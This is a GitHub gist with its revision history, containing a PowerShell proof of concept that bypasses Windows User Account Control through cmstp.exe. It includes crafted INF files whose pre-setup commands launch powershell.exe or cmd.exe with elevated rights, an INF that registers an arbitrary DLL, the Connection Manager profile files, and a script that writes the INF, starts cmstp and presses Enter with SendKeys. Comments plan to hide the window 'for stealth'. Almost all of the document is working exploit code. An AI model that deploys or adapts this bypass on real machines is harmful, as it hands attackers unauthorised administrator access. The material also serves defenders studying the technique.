-
-
Save tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1 to your computer and use it in GitHub Desktop.
Revisions
-
Tyler Applebaum revised this gist
Aug 21, 2017 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,3 +1,4 @@ ; No longer needed - embedded in script now [version] Signature=$chicago$ AdvancedINF=2.5 -
Aug 21, 2017 . 1 changed file with 45 additions and 6 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,8 +5,46 @@ # Todo: Hide window on screen for stealth # Todo: Make script edit the INF file for command to inject... Function script:Set-INFFile { [CmdletBinding()] Param ( [Parameter(HelpMessage="Specify the INF file location")] $InfFileLocation = "$env:temp\CMSTP.inf", [Parameter(HelpMessage="Specify the command to launch in a UAC-privileged window")] [String]$CommandToExecute = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ) $InfContent = @" [version] Signature=`$chicago`$ AdvancedINF=2.5 [DefaultInstall] CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install $CommandToExecute taskkill /IM cmstp.exe /F [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [Strings] ServiceName="CorpVPN" ShortSvcName="CorpVPN" "@ $InfContent | Out-File $InfFileLocation -Encoding ASCII } Function Get-Hwnd { @@ -75,13 +113,13 @@ function Set-WindowActive } } . Set-INFFile #Needs Windows forms add-type -AssemblyName System.Windows.Forms If (Test-Path $InfFileLocation) { #Command to run $ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe" $ps.Arguments = "/au $InfFileLocation" $ps.UseShellExecute = $false #Start it @@ -98,4 +136,5 @@ until ((Set-WindowActive cmstp).Hwnd -ne 0) Set-WindowActive cmstp #Send the Enter key [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") } -
Aug 21, 2017 . 4 changed files with 1 addition and 679 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +0,0 @@ This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,115 +0,0 @@ This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,290 +0,0 @@ This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,289 +1,22 @@ [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall] CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe taskkill /IM cmstp.exe /F [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [Strings] ServiceName="CorpVPN" ShortSvcName="CorpVPN" -
Oddvar Moe created this gist
Aug 15, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,6 @@ [Profile Format] Version=5 [Connection Manager] CMSFile=CorpVPN\CorpVPN.cms ConnectionType=1 This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,115 @@ [Profile Format] Version=5 [ISP] PBFile=CorpVPN\CorpBook.pbk RegionFile=CorpVPN\CorpBook.pbr PBURL=http://msitpros.com/pbserver/pbserver.dll Mask&SignOn=0x0001 Match&SignOn=0x0000 Mask&SignUp=0x0002 Match&SignUp=0x0002 Mask&Modem=0x0004 Match&Modem=0x0000 Mask&ISDN=0x0008 Match&ISDN=0x0000 Mask&Custom1=0x0010 Match&Custom1=0x0010 Mask&Custom2=0x0080 Match&Custom2=0x0080 Mask&MultiCast=0x0020 Match&MultiCast=0x0000 Mask&Surcharge=0x0040 Match&Surcharge=0x0040 Mask&MultiCastModem=0x0024 Match&MultiCastModem=0x0000 Mask&MultiCastISDN=0x0028 Match&MultiCastISDN=0x0000 Mask&NosurchargeSignon=0x0041 Match&NosurchargeSignon=0x0000 Mask&SurchargeSignon=0x0041 Match&SurchargeSignon=0x0040 FilterA&=NosurchargeSignon FilterB&=SurchargeSignon [Service Types] Modem=Modem ISDN=ISDN Modem MultiCast=MultiCastModem ISDN MultiCast=MultiCastISDN [Connection Manager] RedialCount=3 RedialDelay=5 Version=0 DownloadDelay=15 ServiceName=CorpVPN ServiceMessage= PBMessage= DUN=CorpVPN UserNamePrefix= UserNameSuffix= PasswordHandling=0 Logo= Icon= SmallIcon= TrayIcon= PBLogo= Dialup=1 Direct=1 ConnectionType=0 Tunnel=0 TunnelReferences=0 HelpFile= SecureRoutingCompartment=0 [Animated Logo] [Animation Actions] [Pre-Init Actions] [Pre-Connect Actions] [Pre-Dial Actions] [Pre-Tunnel Actions] [Connect Actions] 0=cmdl32.exe %PROFILE% 0&Flags=16 [Auto Applications] [Disconnect Actions] [On-Cancel Actions] [On-Error Actions] [Menu Options] [Server&CorpVPN] SW_Compress=1 Disable_LCP=0 Negotiate_TCP/IP=1 Negotiate_TCP/IPv6=1 SecureLocalFiles=0 EnforceCustomSecurity=0 Custom_Security=1 Require_PAP=0 Require_SPAP=0 Require_CHAP=1 Require_MSCHAP=0 Require_MSCHAP2=1 Require_W95MSCHAP=0 EncryptionType=3 PW_Encrypt=1 PW_EncryptMS=0 DataEncrypt=0 [TCP/IP&CorpVPN] IP_Header_Compress=1 Gateway_On_Remote=1 IPv6_Gateway_On_Remote=1 Specify_Server_Address=0 IPv6_Specify_Server_Address=0 This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,290 @@ ;=========================================================================== ; ; All of the customizable sections of this file are in the [Strings] section ; at the bottom. ; ;=========================================================================== [version] Signature=$chicago$ AdvancedINF=2.5 [CmDial32.Dll] Version=458754 Build=943259648 ; ------------------------------------------------------------------- ; All User Installs ; ------------------------------------------------------------------- [DefaultInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection ;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM ;AddReg=Xnstall.AddReg.AllUsers RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the All User postinstall commands ; ------------------------------------------------------------------- [PostInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; Single User Installs ; ------------------------------------------------------------------- [DefaultInstall_SingleUser] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPreSetupCommands=RunPreSetupCommandsSection CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM AddReg = Xnstall.AddReg.Private RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the Single User postinstall commands ; ------------------------------------------------------------------- [PostInstall_Single] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; This file section sets up the desktop icon GUID and is thus ; only needed on legacy systems. ; ------------------------------------------------------------------- [Xnstall_Legacy] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon ; These section are kept for legacy compatibility but are no longer used. [Xnstall_Private] [Xnstall_AllUser] ; ------------------------------------------------------------------- ; Section used to uninstall Private user profiles ; ------------------------------------------------------------------- [Remove_Private] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUnInstDestSectionPrivate DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.Private DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; ------------------------------------------------------------------- ; Section used to uninstall All User profiles ; ------------------------------------------------------------------- [Remove] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUninstDestSectionAllUsers DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.AllUser DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or ; after the profile is installed. ; ; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run ; commands before or after the profile is uninstalled. ; ; An example command line is: ; Myprogram.exe /<switches> <options> [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install [RunPostSetupCommandsSection] ;Commands here will be run After setup finishes [RunPreUnInstCommandsSection] ;Commands here will be run before Uninstall Begins [RunPostUnInstCommandsSection] ;Commands here will be run after Uninstall Finishes [RegisterOCXSection] c:\cmstp\AllTheThings.dll ; ------------------------------------------------------------------- ; These are the registry entries for installation. ; ------------------------------------------------------------------- [Xnstall.AddReg.DesktopIcon] "HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,"0x00001000","%ServiceName%" "HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00" ; Please make sure the following three commands are alphabetized by the %Open%, %Delete%, ; and %Settings% entries defined in the Strings section ; the Connect Command "HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%" ; the Delete Command "HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf""" "HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%" ; the Properties Command "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%" [Xnstall.AddReg.AllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "0x00001000", "%49001%" "HKLM", "%AppAct%\Mappings","%ServiceName%","0x00001000","%49001%\%ShortSvcName%.cmp" [Xnstall.AddReg.Private] ; Single User Mappings is now written in code. ;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp" ; ------------------------------------------------------------------- ; These are the registry settings which ; are deleted during uninstall. ; ------------------------------------------------------------------- [Remove.DelReg.AllUser] "HKLM", "%AppAct%\%ServiceName%" "HKLM", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\UserInfo\%ServiceName%" "HKCR", "CLSID\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [Remove.DelReg.Private] "HKCU", "%AppAct%\%ServiceName%" "HKCU", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\SingleUserInfo\%ServiceName%" "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [CleanDir] %49001%\%ShortSvcName% ; ------------------------------------------------------------------- ; These are the directory specifications. ; ------------------------------------------------------------------- [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [CustInstDestSectionSingleUsers] 49000,49001=SingleUser_LDIDSection, 7 [CustUninstDestSectionAllUsers] 49000,49001=XConnMgrLDIDSectionAllUsers, 5 [CustUnInstDestSectionPrivate] 49000,49001=XConnMgrLDIDSectionPrivate, 5 [SingleUser_LDIDSection] "HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", "" [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [XConnMgrLDIDSectionAllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [XConnMgrLDIDSectionPrivate] "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [DestinationDirs] Xnstall.CopyFiles=49001, %ShortSvcName% Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName% Xnstall.CopyFiles.ICM=49001 Remove.DelFiles=49001, %ShortSvcName% Remove.DelFiles.ICM=49001 [SourceDisksNames] 55=, , 0 ; ------------------------------------------------------------------- ; These are the Prompt Sections ; ------------------------------------------------------------------- [RemoveBeginPromptSection] Prompt=%BeginPrompt% ButtonType=YESNO Title=%UninstallAppTitle% [RemoveEndPromptSection] Prompt=%EndPrompt% [Strings] ; ------------------------------------------------------------------- ; These are the non localizable strings... ; ------------------------------------------------------------------- KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles" AppAct = "SOFTWARE\Microsoft\Connection Manager" ; ------------------------------------------------------------------- ; These are the localizable strings... ; ------------------------------------------------------------------- UnexpectedError = "An unexpected error occurred. Please reboot and try the installation again." ; When you localize these commands (they are the commands for the Desktop Icon on legacy ; platforms) you must make sure to re-alphabetize the Registry add calls above. Win95 ; shows the menus in the order they were added and doesn't alphabetize them for you. Settings = "P&roperties" Open = "C&onnect" Delete = "&Delete" ; ------------------------------------------------------------------- ; The following strings are set by the Connection Manager Administration Kit ; Do not change any of the following strings ; ------------------------------------------------------------------- ServiceName="CorpVPN" ShortSvcName="CorpVPN" DesktopGUID="{46E030C3-DC6A-4251-80A3-E3E2753FF0E2}" UninstallAppTitle="CorpVPN" DesktopIcon="" PhonebookPath="" BeginPrompt="Do you want to remove CorpVPN?" EndPrompt="Successfully removed CorpVPN." DisplayLCID=1033 CmLCID=1033 Allow32bit=0 [CMAK Status] InfVersion=5 PhoneName=CorpBook LicenseFile= IncludeCMCode=0 UpdatePhonebook=1 [Extra Files] [Merge Profiles] [Xnstall.AddReg.Icon] HKCR,"CLSID\%DesktopGUID%\DefaultIcon",,,"%11%\CMMGR32.EXE,0" [Xnstall.CopyFiles.SingleUser] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles.ICM] CorpVPN.cmp [Remove.DelFiles.ICM] CorpVPN.cmp [SourceDisksFiles] CorpVPN.inf = 55 CorpVPN.cmp = 55 CorpVPN.cms = 55 [Remove.DelFiles] CorpVPN.cms This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,289 @@ ;=========================================================================== ; ; All of the customizable sections of this file are in the [Strings] section ; at the bottom. ; ;=========================================================================== [version] Signature=$chicago$ AdvancedINF=2.5 [CmDial32.Dll] Version=458754 Build=943259648 ; ------------------------------------------------------------------- ; All User Installs ; ------------------------------------------------------------------- [DefaultInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection ;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM ;AddReg=Xnstall.AddReg.AllUsers RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the All User postinstall commands ; ------------------------------------------------------------------- [PostInstall] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; Single User Installs ; ------------------------------------------------------------------- [DefaultInstall_SingleUser] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPreSetupCommands=RunPreSetupCommandsSection CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM AddReg = Xnstall.AddReg.Private RegisterOCXs=RegisterOCXSection ; ------------------------------------------------------------------- ; Launches the Single User postinstall commands ; ------------------------------------------------------------------- [PostInstall_Single] SmartReboot=N CustomDestination=CustInstDestSectionSingleUsers RunPostSetupCommands=RunPostSetupCommandsSection ; ------------------------------------------------------------------- ; This file section sets up the desktop icon GUID and is thus ; only needed on legacy systems. ; ------------------------------------------------------------------- [Xnstall_Legacy] SmartReboot=N CustomDestination=CustInstDestSectionAllUsers AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon ; These section are kept for legacy compatibility but are no longer used. [Xnstall_Private] [Xnstall_AllUser] ; ------------------------------------------------------------------- ; Section used to uninstall Private user profiles ; ------------------------------------------------------------------- [Remove_Private] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUnInstDestSectionPrivate DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.Private DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; ------------------------------------------------------------------- ; Section used to uninstall All User profiles ; ------------------------------------------------------------------- [Remove] Cleanup=1 SmartReboot=N BeginPrompt=RemoveBeginPromptSection EndPrompt=RemoveEndPromptSection RunPreSetupCommands=RunPreUnInstCommandsSection CustomDestination=CustUninstDestSectionAllUsers DelFiles=Remove.DelFiles, Remove.DelFiles.ICM DelReg=Remove.DelReg.AllUser DelDirs=CleanDir RunPostSetupCommands=RunPostUnInstCommandsSection ; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or ; after the profile is installed. ; ; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run ; commands before or after the profile is uninstalled. ; ; An example command line is: ; Myprogram.exe /<switches> <options> [RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install c:\windows\system32\cmd.exe taskkill /IM cmstp.exe /F [RunPostSetupCommandsSection] ;Commands here will be run After setup finishes [RunPreUnInstCommandsSection] ;Commands here will be run before Uninstall Begins [RunPostUnInstCommandsSection] ;Commands here will be run after Uninstall Finishes ; ------------------------------------------------------------------- ; These are the registry entries for installation. ; ------------------------------------------------------------------- [Xnstall.AddReg.DesktopIcon] "HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,"0x00001000","%ServiceName%" "HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00" ; Please make sure the following three commands are alphabetized by the %Open%, %Delete%, ; and %Settings% entries defined in the Strings section ; the Connect Command "HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%" ; the Delete Command "HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf""" "HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%" ; the Properties Command "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp""" "HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%" [Xnstall.AddReg.AllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "0x00001000", "%49001%" "HKLM", "%AppAct%\Mappings","%ServiceName%","0x00001000","%49001%\%ShortSvcName%.cmp" [Xnstall.AddReg.Private] ; Single User Mappings is now written in code. ;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp" ; ------------------------------------------------------------------- ; These are the registry settings which ; are deleted during uninstall. ; ------------------------------------------------------------------- [Remove.DelReg.AllUser] "HKLM", "%AppAct%\%ServiceName%" "HKLM", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\UserInfo\%ServiceName%" "HKCR", "CLSID\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%" "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [Remove.DelReg.Private] "HKCU", "%AppAct%\%ServiceName%" "HKCU", "%AppAct%\Mappings","%ServiceName%" "HKCU", "%AppAct%\SingleUserInfo\%ServiceName%" "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%" [CleanDir] %49001%\%ShortSvcName% ; ------------------------------------------------------------------- ; These are the directory specifications. ; ------------------------------------------------------------------- [CustInstDestSectionAllUsers] 49000,49001=AllUSer_LDIDSection, 7 [CustInstDestSectionSingleUsers] 49000,49001=SingleUser_LDIDSection, 7 [CustUninstDestSectionAllUsers] 49000,49001=XConnMgrLDIDSectionAllUsers, 5 [CustUnInstDestSectionPrivate] 49000,49001=XConnMgrLDIDSectionPrivate, 5 [SingleUser_LDIDSection] "HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", "" [AllUSer_LDIDSection] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "" [XConnMgrLDIDSectionAllUsers] "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [XConnMgrLDIDSectionPrivate] "HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "" [DestinationDirs] Xnstall.CopyFiles=49001, %ShortSvcName% Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName% Xnstall.CopyFiles.ICM=49001 Remove.DelFiles=49001, %ShortSvcName% Remove.DelFiles.ICM=49001 [SourceDisksNames] 55=, , 0 ; ------------------------------------------------------------------- ; These are the Prompt Sections ; ------------------------------------------------------------------- [RemoveBeginPromptSection] Prompt=%BeginPrompt% ButtonType=YESNO Title=%UninstallAppTitle% [RemoveEndPromptSection] Prompt=%EndPrompt% [Strings] ; ------------------------------------------------------------------- ; These are the non localizable strings... ; ------------------------------------------------------------------- KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles" AppAct = "SOFTWARE\Microsoft\Connection Manager" ; ------------------------------------------------------------------- ; These are the localizable strings... ; ------------------------------------------------------------------- UnexpectedError = "An unexpected error occurred. Please reboot and try the installation again." ; When you localize these commands (they are the commands for the Desktop Icon on legacy ; platforms) you must make sure to re-alphabetize the Registry add calls above. Win95 ; shows the menus in the order they were added and doesn't alphabetize them for you. Settings = "P&roperties" Open = "C&onnect" Delete = "&Delete" ; ------------------------------------------------------------------- ; The following strings are set by the Connection Manager Administration Kit ; Do not change any of the following strings ; ------------------------------------------------------------------- ServiceName="CorpVPN" ShortSvcName="CorpVPN" DesktopGUID="{46E030C3-DC6A-4251-80A3-E3E2753FF0E2}" UninstallAppTitle="CorpVPN" DesktopIcon="" PhonebookPath="" BeginPrompt="Do you want to remove CorpVPN?" EndPrompt="Successfully removed CorpVPN." DisplayLCID=1033 CmLCID=1033 Allow32bit=0 [CMAK Status] InfVersion=5 PhoneName=CorpBook LicenseFile= IncludeCMCode=0 UpdatePhonebook=1 [Extra Files] [Merge Profiles] [Xnstall.AddReg.Icon] HKCR,"CLSID\%DesktopGUID%\DefaultIcon",,,"%11%\CMMGR32.EXE,0" [Xnstall.CopyFiles.SingleUser] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles] CorpVPN.cms,,,4 CorpVPN.inf [Xnstall.CopyFiles.ICM] CorpVPN.cmp [Remove.DelFiles.ICM] CorpVPN.cmp [SourceDisksFiles] CorpVPN.inf = 55 CorpVPN.cmp = 55 CorpVPN.cms = 55 [Remove.DelFiles] CorpVPN.cms This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,101 @@ # UAC Bypass poc using SendKeys # Version 1.0 # Author: Oddvar Moe # Functions borrowed from: https://powershell.org/forums/topic/sendkeys/ # Todo: Hide window on screen for stealth # Todo: Make script edit the INF file for command to inject... # Point this to your INF file containing your juicy commands... $InfFile = "c:\cmstp\UACBypass.inf" Function Get-Hwnd { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName ) Process { $ErrorActionPreference = 'Stop' Try { $hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle } Catch { $hwnd = $null } $hash = @{ ProcessName = $ProcessName Hwnd = $hwnd } New-Object -TypeName PsObject -Property $hash } } function Set-WindowActive { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name ) Process { $memberDefinition = @' [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd); '@ Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32 $hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd If ($hwnd) { $onTop = New-Object -TypeName System.IntPtr -ArgumentList (0) [User32.Api]::SetForegroundWindow($hwnd) [User32.Api]::ShowWindow($hwnd, 5) } Else { [string] $hwnd = 'N/A' } $hash = @{ Process = $Name Hwnd = $hwnd } New-Object -TypeName PsObject -Property $hash } } #Needs Windows forms add-type -AssemblyName System.Windows.Forms #Command to run $ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe" #$ps.Arguments = "/au c:\cmstp\UACBypass.inf" $ps.Arguments = "/au $InfFile" $ps.UseShellExecute = $false #Start it [system.diagnostics.process]::Start($ps) do { # Do nothing until cmstp is an active window } until ((Set-WindowActive cmstp).Hwnd -ne 0) #Activate window Set-WindowActive cmstp #Send the Enter key [System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
Tyler Applebaum
revised
this gist 
Oddvar Moe
created
this gist